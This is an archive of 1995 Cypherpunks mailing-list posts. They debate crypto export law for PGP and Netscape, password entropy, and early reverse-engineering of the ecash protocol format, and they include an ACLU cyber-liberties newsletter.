> >allow it to be exported.  Has A conspired with B to export the program?
> >
> >Let's ask the grand jury investigating Phil....
> 
> That's a possible problem, I suppose, but wouldn't you be protected if
> your license agreement with MIT (or whoever) specified redistribution
> "for domestic use only"?
> 
"protected"? No.  "Helped"? Yes.  The government can argue to the jury 
that the agreement was a sham and you knew it....

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 23 Nov 1995 05:43:33 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Repeated Words/characters in Password/Phrase
In-Reply-To: <acce4e6b00021004573a@[205.199.118.202]>
Message-ID: <199511222102.QAA10377@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
>At 11:11 PM 11/14/95, Ted Cabeen wrote:
>>Do repeated words in a PGP passphrase make the pass phrase less secure than
>>a passphrase without any repeated words?  And on the same note, do repeated
>>letters in a UNIX password make that password easier to break? I can't seem
>>to find anything in my books on cryptography that mention this.  Thanks.
>
>More of an information theory question than a crypto question. There are no
>simple answers to this question, but some examples will help:
>
>The password "foo" is not very good, and "foofoo" is only slightly better.
>And "foofoofoo" is slightly better, and so on, to a point. But
>"foofoo....foo" is not N times better than a single "foo," because the
>_pattern_ is simply desribed: "repeat "foo" N times." Thus, the information
>content or entropy of "foofoofoo....foo" is not N times greater than the
>entropy of "foo."
>
>A some dictionary attacks which would trivially find "foo" will not find
>"foofoo," or "foofoofoo," etc., so this could be a great help. More
>sophisticated dictionary attacks may of course take the 30,000 or so most
>common names, words, places, and then do various permutations, reversals,
>repetitions, etc.
>
>So this is why there is not likely to be a simple answer to your question.
>Repeating words in a passphrase can make the passphrase easier to remember
>(such as "thequickquickbrownfox") and make certain kinds of attacks harder,
>but with not as much of an increase in entropy at the increased number of
>raw characters might otherwise suggest.
>
>Other "heuristics" (simple rules of thumb) for passphrases are contained in
>the PGP documents, and in numerous other places: avoid names, add
>nonstandard English keyboard characters liberally (even if using real
>words), etc. The "best" passphrases, it almost goes without saying, are the
>longest and most "unpredictable," so that "7f#qp)djQ10hB%3t+1?U4SVp5" is
>much superior to "%foo%foo".

I don't buy this argument.  The only reason "foofoo" could have less
entropy than "foobar" is if the attacker had some reason to know that
the user tends to choose doubled passwords, or something like that.

If the user has historically chosen passwords with roughly six bits of
entropy per character, then "foofoo" is exactly as likely as "foobar",
and is no "weaker" from an information-theoretic perspective.

In fact, information theory would generally note that discarding the
"foofoo" choice slightly reduces the entropy in the password.

It is also worth noting that any good password algorithm doesn't permit
one to determine if the password is _partly_ right, so entropy
measurements can't really meaningfully be made on a per-character
basis, only on the password as a whole.

It is because the attacker knows that many (if not most) users tend to
prefer passwords that are "easier to remember" that leads him to try
the more memorable combinations *first*.  The information-theoretic
interpretation of this is that such memorable passwords have less
entropy than the others, because the probability that the next account
an attacker tries to guess uses a memorable password is higher than the
probability that it doesn't.

"foobar" occurs as a password less frequently than "foofoo", so it has
more entropy.  The extra entropy didn't come from the use of more
characters, it came from all the more lazy users who like "foofoo"
better.

To use a variant of Tim's example, "7f#qp)djQ10hB%3t+1?U4SVp5" is not
measurably better than "7f#q#)d#Q10h#%#t+1#U4S#p5", even though the
latter uses the "#" character much more frequently than the first.
Both passwords are so far down the list that they probably have never
occurred as passwords.  Both contain effectively the same entropy.

To address the original question:
>>Do repeated words in a PGP passphrase make the pass phrase less secure than
>>a passphrase without any repeated words?

Probably not.  It may even increase security, as "the quick brown fox"
is more frequently used than "the quick quick brown fox" as someone's
password, and should, therefore, be tried first.

>>And on the same note, do repeated
>>letters in a UNIX password make that password easier to break?

Again, probably not.  If the letters are generally chosen at random,
then "abafraa" is just as likely to occur as "abifryu".  If the letters
are chosen less randomly, like from a name, then "anna" is more likely
than "xavier", but less likely than "john".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 23 Nov 1995 05:53:42 +0800
To: "Thomas M. Swiss" <tms@tis.com>
Subject: Re: MED_vac
In-Reply-To: <199511152004.PAA05104@ziggy.tis.com>
Message-ID: <199511222108.QAA10547@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"Thomas M. Swiss" writes:
>     A (possibly stupid) thought: could commercial key escrow help here?
>
>     I very much want hospitals to have fast access to my medical data if
>my broken and bleeding body should come through their door, even if I am
>unconscious and my personal physician cannot be reached. On the other hand,
>I don't want anyone to be snooping through them right now.

Actually, Bell Labs outlines a system which can preserve anonymity
under these circumstances in "The Use of Communications Networks to
Increase Personal Privacy In a Health Insurance Architecture" at
<URL:ftp://ftp.research.att.com/dist/anoncc/privacy.health.ps.Z>.

It's based on their anonymous credit card protocol, which is really a
sort of identity escrow service managed by a remailer.  You might find
it interesting.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Thu, 23 Nov 1995 05:25:35 +0800
To: Eric Anderson <ericande@cnw.com>
Subject: Re: Visual Basic 4.0 encryption prog.
In-Reply-To: <01BAB5D0.4CBEAEE0@king1-04.cnw.com>
Message-ID: <Pine.SUN.3.91.951122153315.26251W@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 Nov 1995, Eric Anderson wrote:

> 	I just scored a copy of visual basic 4.0 and I was wondering how feasible it would be to write a program for Window$ 95 that would use RSA or IDEA and the Win95 exchange interface. I plan on buying Applied Cryptography probably on Fri. when I get paid.
> 	My requirements/goals are: 100% compatibility with M$ Exchange, ease of use (Point & Click/ drag & drop) and last but not least, STRONG public key encryption using "off-the shelf
> code. 


> 	So my ??? Is this: Is it possible? Or should I just go out and buy a C++ compiler.
> I don't really care about ITAR or any of that other BS, I just won't put MY name on it.

You've already put your name on it by asking this question and providing 
so much detail on what tools you would use and what you want to do. :-)

But there is no reason why this isn't possible in ANY language.  You'll 
just have to write a lot of code by hand, or port to VB... especially the 
large-number routines.

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
===================http://www.dorsai.org/~sunder/=========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Thu, 23 Nov 1995 05:40:00 +0800
To: Still <cypherpunks@toad.com>
Subject: Re: PGP in Canada
In-Reply-To: <Pine.A32.3.91.951122154553.3843A-100000@juliet.stfx.ca>
Message-ID: <9511221544.ZM6977@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

<fearing the wrath of the cpunks, but deciding that it's better to get this
`sorted out' than keep on being wrong>

Please take all of the following as being mystatements of
what I think, not statements of absolute truth. [That is,
call the CEC yourself.]

It is legal for a Canadian citizen to import PGP into Canada
under Canadian law. It is legal to use either the international
or yanqui versions in Canada--software patents don't apply [I
don't think].

It is legal for an American to give pgp to an American citizen,
a permanent legal resident alien of the United States, or to a
Canadian citizen, providing the receiver is in Canada or the
United States.

It is *illegal* for a Canadian to export pgp anywhere except the
U.S., if the pgp came from the U.S. and no substantial changes
have been made to it.

For more docs, see
http://www.io.org/~samwise/crypto/
[yes, I know, it hasn't changed in a while, and there's some stuff
missing [such as the Area Control List], but the most important
thing on that web page is the information about who to ask: there's
an office in Halifax]

My recommendation: get the international version of PGP. [Unless, of
course, the above statements are wrong, in which case my reasoning
in favour of the international version are faulty.]

richard

- --
Richard Martin                           I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLOLkh1gtCYLvIJ1AQHkfAQAkz8HnhxC0S59PHCajFQYGjp1dCVNzbf2
JZnv4epN/KSr6K1f/v2fLF9PoCylADHulHze/oeN1T3gEel6MfNQheZTFofu3381
y9O39q4lmRyS6YrL07T9A3hr3taCrx3W9L7HZancKmKQk1EyNHgG+0ECiDR20Lp9
H0AyGkGSmng=
=hN9v
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Thu, 23 Nov 1995 08:18:09 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
In-Reply-To: <Pine.SUN.3.91.951122145559.24028D-100000@viper.law.miami.edu>
Message-ID: <199511230002.QAA01527@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> > >[regarding suggestion that netscape give mit or someone a 128 bit version 
> > >to place on an ftp server]
> > >
> > >This is not an apology for the the ITAR, just my usual lawyerly overcaution:
> > >
> > >Suppose A gives B a program that is export controlled, intending for B to 
> > >allow it to be exported.  Has A conspired with B to export the program?
> > >
> > >Let's ask the grand jury investigating Phil....
> > 
> > That's a possible problem, I suppose, but wouldn't you be protected if
> > your license agreement with MIT (or whoever) specified redistribution
> > "for domestic use only"?
> > 
> "protected"? No.  "Helped"? Yes.  The government can argue to the jury 
> that the agreement was a sham and you knew it....

(Great, I'm about to argue law with a REAL LAWYER (tm).  And they promised me
that Cypherpunks wouldn't cause brain damage ... )

OK, suppose A does NOT intend for B to export it, and he does anyway ...

Now suppose that instead of giving it to B, he SELLS it to him ...

So a pirated copy of the commercial version of Netscape's Navigator shows
up in a Hong Kong flea market, and Barksdale goes to jail ...

(Members of the jury, Mr. Barksdale MUST have known that one of his millions
of paying customers would export that dangerous munition ...)

The logical ludicrousness of ITAR shows up fast no matter which angle you
look at it from, and yet the people with the <exonized for your protection>
to actually challenge it aren't the big companies who stand to gain the
most financially, it's a bunch of guys (a lot of whom hang around here
sometimes) who are successfully giving away 'export controlled' software,
while the people with the resources to really fight this thing sit on the
sidelines waiting for Phil Zimmerman or Phil Karn to get them off the hook
so they can go and make a lot of money.

It seems to me that there's something very wrong with this picture, and while
I don't mean this in any way to be taken personally, one of the big things
I see as wrong is overcautious lawyers.

-- 
Jeff Simmons                           jsimmons@goblin.punk.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Still <x93ojg@juliet.stfx.ca>
Date: Thu, 23 Nov 1995 04:44:54 +0800
To: CypherPunks List <cypherpunks@toad.com>
Subject: PGP
Message-ID: <Pine.A32.3.91.951122154553.3843A-100000@juliet.stfx.ca>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know what the laws are regarding the export of PGP into 
Canada?  I know that it is not allowed to exported overseas but what is 
the ruling on into Canada.  Some sites say that it can be exported into 
Canada and others say that it can't.  Can anyone out there give me some 
information on this topic?

--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg@stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Still <x93ojg@juliet.stfx.ca>
Date: Thu, 23 Nov 1995 04:52:36 +0800
To: cypherpunks@toad.com
Subject: Re: PROPOSAL: cypherpunks-news@toad.com?
In-Reply-To: <9510228170.AA817074264@cc3.dttus.com>
Message-ID: <Pine.A32.3.91.951122161441.3843B-100000@juliet.stfx.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, Martin Diehl wrote:

>      My vote, for what it's worth, is don't split the list.  It won't work 
>      because the extra posts ARE going to go to this list because that's 
>      where they believe their readers are.
>      

I have got to agree with Martin.  If you split the group a lot of us a 
going to subscribe to both groups so when people submit this stuff and 
cross post it we are going to get two copies of the same message.  I 
think I can speak for most people when I say that I don't need that extra 
mail volume.


--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg@stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yih-Chun Hu <yihchun@u.washington.edu>
Date: Thu, 23 Nov 1995 08:46:54 +0800
To: blancw@accessone.com
Subject: Re: Q: Bookshop in Seattle
In-Reply-To: <9511112134.AA29395@pulm1.accessone.com>
Message-ID: <Pine.OSF.3.91l.951122161727.10225A-100000@saul2.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain



This may be a bit late...
I just picked it up from UBS for $49.95. It's ordered at B&N for $39.95
I think.

On Sat, 11 Nov 1995 blancw@accessone.com wrote:

> 
>   Can someone point me towards a bookshop in Seattle that is likely to
> have the second edition of Applied Cyptography ? 
> .......................................
> 
>  Tower Books (I've seen it advertised there)
>  The University BookStore (probably)
>  Barnes & Noble (potentially)
> 
> 
>   ..
> Blanc
> 
> 
> 

+---- Yih-Chun Hu (finger:yihchun@cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun@cs.washington.edu |
| http://weber.u.washington.edu/~yihchun         yihchun@u.washington.edu  |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641        B2 A0 DE 9E 36 C0 EB A6  F9 3E D2 DD 2F 27 74 79    |
| 2047/DF0403F9        18 EB 62 C8 7F 06 04 67  42 76 24 E2 99 D1 07 DC    |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 23 Nov 1995 09:24:23 +0800
To: cypherpunks@toad.com
Subject: Re: ecash protocol: Part 1
In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
Message-ID: <199511230103.RAA15911@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg <iang@cory.EECS.Berkeley.EDU> writes:

>Last week, I was taking a look at the ecash protocol (no, I don't have a copy;
>I have a binary, which I can't even run...).  

>I've managed to decipher a useful bit of the first message sent from
>the shop to the payer.  It's the Payment Request, and contains the following
>information:

>o Header identifying packet as Payment Request
>o The integer 4
>o The payment amount, in cents
>o The time (seconds since 1970)
>o The integer 79
>o The name of the shop (payee)
>o A description of the item being paid for
>o An empty string
>o The integer 0
>o End of Record marker

That's very interesting work!  What are the string formats, are they null
terminated or Pascal-style with a preceding count byte?  How did you
identify "an empty string", wouldn't that just be a byte of 0?  How did
you know it was an empty string rather than just a 0.

Did you get this by inducing a shop to send a payment request message to
some program you wrote which was listening on the ecash port?

I think a good way to get the rest of the information would be with a
proxy which logged message traffic.  I know ecash has some proxy support
but I'm not sure how it works.  There are SOCKS proxies and http proxies,
and I don't know which it uses.  I used a logging httpd proxy to derive
the data for the SSL challenges I did this past summer.  It might be
interesting to post the binary data from some ecash transactions.

>I guess the important bit is that the payee, the item being bought,
>and the cost are sent _in the clear_.  Some of the people I've talked
>to think this is a huge privacy breach, and some don't.  You all can
>debate this now.  Lucky can, if he wishes, add insight, and/or tell us
>what DC may do about this.

I wonder if it would be legal to write shop software which sent such a
payment request, took the resulting coins, and deposited them in the bank
(if we could figure out all the protocols necessary).  This particular
sequence of operations would not appear to infringe anybody's patents -
there are no blinding operations involved.  It's not clear how useful
such a program would be but at least it would be one step away from the
DigiCash monopoly.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Thu, 23 Nov 1995 09:53:38 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <199511221048.CAA26409@jobe.shell.portal.com>
Message-ID: <30B3CE64.6BF2@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice (or someone representing themselves as Alice) said:

> What I'm trying to say is that if someome posts from watson.ibm.com,
> and IF they are talking about OS/2, we will not accept that they are
> not speaking independantly of the knowledge they have garnered from
> watson.

And that is understable.

> In the same way, someone who writes from Netscape.com or AT&T, or Sun
> and tries to disclaim that they are speaking for the company, when
> they step out as an employee of a company is deluding themselves.

This is a complete non sequitur. See if you can follow this: only those
authorized by the company to speak for the company are authorized speak
for the company.

There is a genuine difference between a corporate officer saying

	The Amalgamated Widget corporate policy on stong crypto is ...

and some engineer from Amalgamated Widget saying

	My private opinion on strong crypto is ...

The consequence of every statement by every employee being taken as
company policy is that every employee (except for public relations) will
be prohibited from contributing to any public forum or even answering
apparently innocuous questions on the net. This would not be a desirable
outcome.

Still speaking for myself,
PK
--
Philip L. Karlton		karlton@netscape.com
Principal Curmudgeon		http://www.netscape.com/people/karlton
Netscape Communications




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A.Back@exeter.ac.uk
Date: Thu, 23 Nov 1995 02:19:53 +0800
To: perry@piermont.com
Subject: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
In-Reply-To: <199511221609.LAA21172@jekyll.piermont.com>
Message-ID: <5579.199511221742@olib>
MIME-Version: 1.0
Content-Type: text/plain



Perry Metzger <perry@piermont.com> writes:
> "James M. Cobb" writes:
> > Friend, 
> >  
> >  
> > The following information from 
> 
> 1) You are not my friend.
> 
> 2) My private mail to you hasn't convinced you to stop this barrage of
>    reposts. Would you please do so?

I am inclined to agree with Perry in as much as the volume of posts to
the cypherpunks list is greatly increased by reposts of news from
other mailing lists, USENET newsgroups, WWW sources, newspapers, TV
programs, films, books, talks, etc.  While some of the information
posted is interesting, and relevant, some others are less relevant,
bordering on noise.

It is much more efficient of list bandwidth to post short pointers
only, of the style John Young <jya@pipeline.com> posts.  Or an
alternative I have been thinking might be useful: a separate list.

The proposal: a separate list for current-event reports/news/reposts.

I think it would be useful if a separate mailing list were set up on
toad.com, called say "cypherpunks-news@toad.com" (or whatever) to
distinguish it from the main cypherpunks list.

That way people who aren't interested to read reposts just don't
subscribe to cypherpunks-news, and those who want to catch up on
cypherpunks related current events, media reports etc, can browse
through the archives for cypherpunks-news.

What do others think?

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Thu, 23 Nov 1995 09:34:39 +0800
To: beeson@aclu.org
Subject: ACLU Cyber-Liberties Update -- 11/22/95
Message-ID: <951122180144_114185619@mail06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------
November 22, 1995
ACLU CYBER-LIBERTIES UPDATE
A bi-weekly e-zine on cyber-liberties cases and controversies
at the state and federal level.
----------------------------------------------------------------
IN THIS ISSUE:

*     New York Civil Liberties Union Opposes Discipline of Cornell Students
for Offensive Online Speech

*     Seattle Negotiates New Franchise Agreement with Cable Network to Offer
Internet Access; ACLU of Washington Gives Testimony on Privacy Implications

*     Watch Out for Cyber-Liberties Infringements in Counter-Terrorism
Legislation; House May Consider Bill in Early December

*     Update and ACTION ALERT on Federal Online Indecency Legislation

*     Online Discussion Groups on Electronic Access Issues

----------------------------------------------------------------
STATE PAGE (Legislation/Agency/Court Cases)
----------------------------------------------------------------
* New York Civil Liberties Union Opposes Discipline of Cornell Students for
Offensive Online Speech

The latest controversy over appropriate use of the Internet at universities
erupted last week after four Cornell students made a list of "75 reasons why
women should not have freedom of speech" and the list got loose on the
Internet.  Responding to e-mail and phone complaints about the message,
Cornell considered disciplinary action against the students.

The NYCLU wrote a letter to Cornell on Thursday, November 16th, urging
Cornell not to proceed with disciplinary action.  The letter said, "Freedom
of expression, especially in the academic forum, is designed to encourage
truth-seeking by protecting the challenge and response of intellectual
discourse. . . .  It is understandable that university officials should be
concerned about the increase in the use of sexist language. . . .  However,
no matter how troubling or offensive the message is, the administration of
Cornell University should not depart from principles of freedom of expression
when addressing the issues surrounding this dispute."  The letter went on to
note that "the marketplace theory of free expression appears to be in full
swing as the wrong-minded e-mail message has apparently already provoked
 thousands of angry messages' both to Cornell and to the particular four
students."

On Thursday afternoon, Cornell announced that it would not pursue any
disciplinary action against the students.

For a copy of the letter that NYCLU sent to Cornell, send a message to
infoaclu@aclu.org with "NYCLU Letter to Cornell" in the subject line.  For
more information, contact Beth Haroules, Staff Attorney, NYCLU, at
212-382-0557.

----------------------------------------------------------------
*     Seattle Negotiates New Franchise Agreement with Cable Network to Offer
Internet Access; ACLU of Washington Testifies at Hearing on Privacy
Implications

Cities across the country are beginning to renegotiate franchise agreements
with cable networks who want to get into the Internet access business.  Civil
libertarians must work to ensure that strong privacy protections are included
in these agreements.

The City of Seattle is currently negotiating a new franchise agreement with
TCI of Seattle, Inc., and the ACLU of Washington urged the city to include
provisions to protect consumer privacy.  In a letter dated November 9th,
ACLU-W said that "franchisees should be prohibited from collecting any data
on individual use of the cable network, including Internet access, except
that data minimally needed for billing purposes. . . .  [T]he franchisee
should be precluded from collecting information about which other Internet
sites are accessed through the cable network, which newsgroups are read,
which real-time interactive forums are participated in, or any other
information that could be used to compile a data profile of the subscriber."
 The letter also urged the city to require technological protections, like
encryption, to guard against unauthorized tapping.

For a copy of the letter, send a message to infoaclu@aclu.org with "cable
franchise agreement" in the subject line.  For more information, contact Doug
Klunder, ACLU-W Information Technology Committee, dougk@eskimo.com.

----------------------------------------------------------------
FEDERAL PAGE (Congress/Agency/Court Cases)
----------------------------------------------------------------
*     Watch Out for Cyber-Liberties Infringements in Counter-Terrorism
Legislation; House May Consider Bill in Early December

The House of Representatives is scheduled to debate a broad counter-terrorism
bill in early December.  (The Senate passed a similar bill in June 1995.)
 While the counter-terrorism bill contains many unconstitutional provisions,
the net community should be particularly alert to the following:

1.  The pending House counter-terrorism bill contains a funding mechanism for
vastly expanded wiretap capabilities for federal law enforcement (authorized
by the Digital Telephony law passed by Congress last year). The FBI's scheme
would give government an unprecedented ability to intrude on privacy through
increased wiretaps.  The net community should oppose this and any other
funding scheme for the FBI's wiretap proposal.  (See our 11/8 issue of the
Cyber-Liberties Update for an ACLU statement and action alert on the federal
wiretap proposal.)

2.  The version of counter-terrorism legislation already passed by the Senate
contains a revised Feinstein Amendment, which makes it a felony "to
distribute by any means information pertaining to, in whole or in part, the
manufacture of explosive materials, if the person intends, or knows that such
explosive materials or information will likely be used for" criminal
purposes.  While the legislation applies to all media, it grew out of Senator
Feinstein's vilification of the Internet at the Senate's May 11th
counter-terrorism  hearings.  The House version of counter-terrorism
legislation does not currently contain language like the Feinstein Amendment,
but the online community should stand ready to oppose any effort to include
such unconstitutional provisions in the final House bill.

For a copy of the ACLU's letter to the Senate in opposition to the original
Feinstein Amendment, send a message to infoaclu@aclu.org with "Feinstein
Amendment" in the subject line.

For further information on the ACLU's opposition to counter-terrorism
legislation (which would also expand the FBI's powers in electronic
surveillance and other areas), visit the ACLU's Constitution Hall on America
Online, at keyword ACLU.

----------------------------------------------------------------
*     Update and ACTION ALERT on Federal Online Indecency Legislation

The Conference Committee on the telecommunications bill is currently
considering whether to remove provisions that would make "indecency" and
other speech a crime in cyberspace.  The Christian Coalition and other
anti-free-speech groups continue to heavily lobby the Conferees to make the
new speech crimes even stricter than the Exon Amendment.  To counter this
backlash, the online community must overwhelm the Conference Committee with a
loud and clear message -- that parental empowerment tools and not big
government censorship are the only effective means to address children's
access to online content.

While the Conference Committee is home for Thanksgiving, we urge you to call
the Conferees in your state.  To find a list of the home office phone numbers
for the Conferees, see the current ACTION ALERT at http://www.vtw.org/

The ACLU continues to prepare for a constitutional challenge to the online
censorship provisions if they become law.  Please contact Ann Beeson,
beeson@aclu.org, if your organization is interested in being a plaintiff in
this ground-breaking litigation that will define First Amendment rights in
cyberspace.

----------------------------------------------------------------
Online Discussion Groups on Electronic Access Issues
----------------------------------------------------------------
The following discussion groups are actively debating government information
and access issues:

GOVPUB -- issues related to publishing local and state government information
online
Subscribe: listserv@vm1.nodak.edu
Message: subscribe govpub

GOVACCESS -- citizen access to government information
Subscribe: majordomo@well.dom
Message: subscribe govaccess

PUBPOL-D -- substantive discussion of public policy issues
Subscribe: listserv@vm1.spcs.umn.edu
Message: subscribe pubpol-d [your name]

COMMUNET -- issues related to community and civic networks
Subscribe: listserv@uvmvm.uvm.edu
Message: subscribe communet [your name]

----------------------------------------------------------------
ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE
----------------------------------------------------------------
Stay tuned for news on the ACLU's world wide web site, under construction at
http://www.aclu.org.  America Online users should check out our live chats,
auditorium events, *very* active message boards, and complete news on civil
liberties, at keyword ACLU.

----------------------------------------------------------------
ACLU Cyber-Liberties Update
Editor: Ann Beeson (beeson@aclu.org)
American Civil Liberties Union National Office
132 West 43rd Street
New York, New York 10036

To subscribe to the ACLU Cyber-Liberties Update, send a message to
infoaclu@aclu.org with "subscribe Cyber-Liberties Update" in the subject line
of your message.  To terminate your subscription, send a message to
infoaclu@aclu.org with "unsubscribe Cyber-Liberties Update" in the subject
line.

For general information about the ACLU, write to infoaclu@aclu.org.
----------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 24 Nov 1995 18:19:05 +0800
To: Jeff Simmons <cypherpunks@toad.com
Subject: Re: Spam the Sign!
Message-ID: <199511240423.UAA25467@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:02 PM 11/22/95 -0800, Jeff Simmons wrote:

> and yet the people with the [balls]
> to actually challenge it aren't the big companies who stand to gain the
> most financially, it's a bunch of guys (a lot of whom hang around here
> sometimes) who are successfully giving away 'export controlled' software,

If you have looked at court cases recently, you will notice 
that most juries will find a corporation guilty of anything, 
no matter how absurd.  At a gut level they feel that the 
pursuit of profit is itself a crime, and that the pursuit 
of profit in an organized group is a flagrant and terrible 
crime, deserving of the most savage punishment, unless that 
pursuit has been thoroughly and carefully supervised and 
authorized by the state.


They are much more reluctant to punish an individual, which is why
the government wants to keep Phil in permanent legal limbo.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 24 Nov 1995 18:17:51 +0800
To: Jay Campbell <cme@clark.net>
Subject: Re: crypto for porno users
Message-ID: <199511240423.UAA25472@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:17 AM 11/23/95 -0800, Jay Campbell wrote:
> A common way to get around prostitution sting operations 
> is to ask the lady to expose sensitive portions of her anatomy 
> to prove her sincerity before the would-be customer commits 
> to any transactions; this sort of thing is also becoming 
> commonplace on the net for pornography or pirated software,

This protects the customer against stings, but it does not
protect the supplier against stings.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 23 Nov 1995 09:54:58 +0800
To: Richard Martin <rmartin@aw.sgi.com>
Subject: Re: PGP in Canada
In-Reply-To: <9511221544.ZM6977@glacius.alias.com>
Message-ID: <Pine.3.89.9511222044.B25201-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 22 Nov 1995, Richard Martin wrote:

> It is legal for a Canadian citizen to import PGP into Canada
> under Canadian law. It is legal to use either the international
> or yanqui versions in Canada--software patents don't apply [I
> don't think].
Yup. RSA's only patented in one country- the USA. Though maybe with NAFTA...?

> It is *illegal* for a Canadian to export pgp anywhere except the
> U.S., if the pgp came from the U.S. and no substantial changes
> have been made to it.

All the same if it was freeware crypto software and completely written 
outside the US, I'm under the understanding that you can export without a 
license. IANAL, I may be wrong. Do double check.

Do mail the export controls division of external affairs and
ask for "Canada's Export Controls", the "General Software Note" and
a specific opinion regarding the exportability of pgp, US crypto,
non-US crypto and freware vs. commercial wares. They also hadn't
made up their mind as to whether ftp constituted export.

They have branches in all major Canadian cities, so I'll mail the nearest
addresses to those who are interested (I'm not at home right now).

> My recommendation: get the international version of PGP. [Unless, of
> course, the above statements are wrong, in which case my reasoning
> in favour of the international version are faulty.]

Sorry to say, it would be pointless, you wouldn't be able to export it from 
here unless it was totally rewritten outside the US (which it I take it 
it isn't, right?)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 23 Nov 1995 10:23:39 +0800
To: cypherpunks@toad.com
Subject: Re: ecash protocol: Part 1
In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
Message-ID: <490jct$11k@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511230103.RAA15911@jobe.shell.portal.com>,
Hal  <hfinney@shell.portal.com> wrote:
